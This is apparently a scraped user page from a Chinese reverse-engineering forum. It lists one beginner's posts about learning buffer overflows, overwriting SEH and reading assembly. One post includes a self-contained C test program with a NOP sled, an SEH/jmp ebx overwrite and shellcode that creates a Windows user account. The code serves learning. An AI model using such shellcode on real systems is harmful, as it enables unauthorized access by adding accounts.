|
|
|
[讨论]大家平常是买书看还是?
网络安全方面的书,我没买过,我的书大部分都是编程基础理论和计算机语言的程序设计教程,比如c# java c javascript 数据库,数据结构等等。现在我学缓冲区溢出全部是看网上的资料,我感觉网上的资料就够我学到了,呵呵。在说我现在没什么钱。 |
|
|
|
[分享]SEH学习心得
div ecx来触发的exception?程序自身触发的exception,能不能提交一段shellcode来触发呢? |
|
[求助]栈溢出利用方式 - 覆盖SEH
谢谢6楼的兄弟,我的意思是不是可以在shellcode中来弄啊,就是模拟一次攻击啊,呵呵,不希望漏洞程序本身就有异常,我还真不知道怎么做了,我是刚学缓冲区溢出,谢谢指教了。今天刚看了一下这个覆盖方式,就像赶快利用一下。我用od看了下,覆盖的位置都正确就是不知道怎么才可以跳到shellcode了,呵呵。并且我对这个利用方式也是了解一点,我现在在去查查资料吧。 |
|
[求助]栈溢出利用方式 - 覆盖SEH
ret已经被覆盖成ffffffff了,但是这样是不是在返回的时候可以把控制交给seh啊。 但是好像是不对的,我用od调试看eip是ffffffff,就无法继续了。我想是不是要在ret之前来触发异常。 还请高手指教,谢谢。 |
|
[求助]栈溢出利用方式 - 覆盖SEH
3楼这位兄弟! 晕啊,我只是要知道seh到底是什么,也就是覆盖方式的原理。我已经描述过了,如果要是懂bufferoverflow的话,应该可以回答我,如果你不知道就别说类似听不懂我说什么,好像是我描述的不够详细是的。 源代码无非就是把shellcode strcpy()到buffer而已,关键是shellcode,如果你认为你需要看shellcode才可以确认的话,我可以把嗲吗给你看。 #include <string.h> int main(void) { char buffer[4]; char ShellCode[]= "\x90\x90\x90\x90" //Overflow buffer "\x44\x44\x44\x44" //Overflow EBP "\xff\xff\xff\xff" //Overflow RET "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //nop "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //nop "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //nop "\x04\xeb\x90\x90" //jmp 04 "\x1b\x4a\xfa\x7f" //jmp ebx "\x8B\xE5\x55\x8B\xEC\x33\xFF\x57\x57\x57\x57\xC7\x45\xF1\x6E\x65" //Create User ShellCode "\x74\x20\xC7\x45\xF5\x75\x73\x65\x72\xC7\x45\xF9\x20\x6c\x20\x2E" "\x80\x45\xFC\x01\xC6\x45\xFD\x61\xC6\x45\xFE\x64\x33\xC0\x88\x45" "\xFF\x8D\x45\xF1\x50\xB8\x4A\x9B\x01\x78\xFF\xD0"; strcpy(buffer,ShellCode); return 0; } |
|
|
|
|
|
[求助]有个跳,如何判断这个跳是跨段跳跃?
我也不太明白,怎么知道段的地址范围呢?能说的详细点吗 版主,谢谢了。呵呵 |
|
新手报到,这里人气很旺呀!
你做的事应用层开发,不过你有C语言的基础很好,建议学汇编语言,PE结构还有ollydbg的使用等。 |
|
[讨论]新兵论坛的技术含量也这么高啊!
看看80x86汇编语言吧。因为你要反汇编,能读懂汇编指令,对汇编工作原理了解下。。 |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值